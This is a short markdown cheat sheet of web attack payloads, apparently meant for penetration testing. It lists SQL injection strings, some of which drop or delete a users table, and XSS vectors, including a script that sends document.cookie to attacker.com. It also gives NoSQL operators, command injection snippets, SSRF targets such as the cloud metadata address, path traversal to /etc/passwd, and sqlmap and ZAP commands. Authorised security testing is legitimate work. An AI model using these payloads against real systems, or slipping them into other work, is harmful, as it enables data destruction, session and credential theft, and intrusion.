# Vulnerability Test Payloads

## SQL Injection

### Text Input

```
' OR '1'='1
' OR 1=1 --
'; DROP TABLE users; --
' UNION SELECT NULL, NULL --
```

### Numeric Input

```
1 OR 1=1
1; DELETE FROM users; --
```

### Blind (Time-based)

```
' OR SLEEP(5) --
' AND (SELECT(SLEEP(5)))a --
```

## XSS (Cross-Site Scripting)

### Reflected

```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
"><script>alert('XSS')</script>
```

### DOM-based

```
javascript:alert('XSS')
<iframe src="javascript:alert('XSS')"></iframe>
```

### Cookie Theft

```html
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
```

## NoSQL Injection (MongoDB)

```json
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "1==1"}
```

## Command Injection

```
; ls -la
| whoami
`whoami`
$(whoami)
```

## SSRF

```
http://localhost/admin
http://127.0.0.1/admin
http://169.254.169.254/ # AWS metadata
```

## Path Traversal

```
../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
```

## CSRF Testing

1. Submit form without CSRF token
2. Reuse captured token multiple times
3. Modify/remove token parameter

## Testing Tools

```bash
# SQLMap
sqlmap -u "http://example.com/page?id=1" --dbs

# OWASP ZAP active scan
zap-cli active-scan http://example.com
```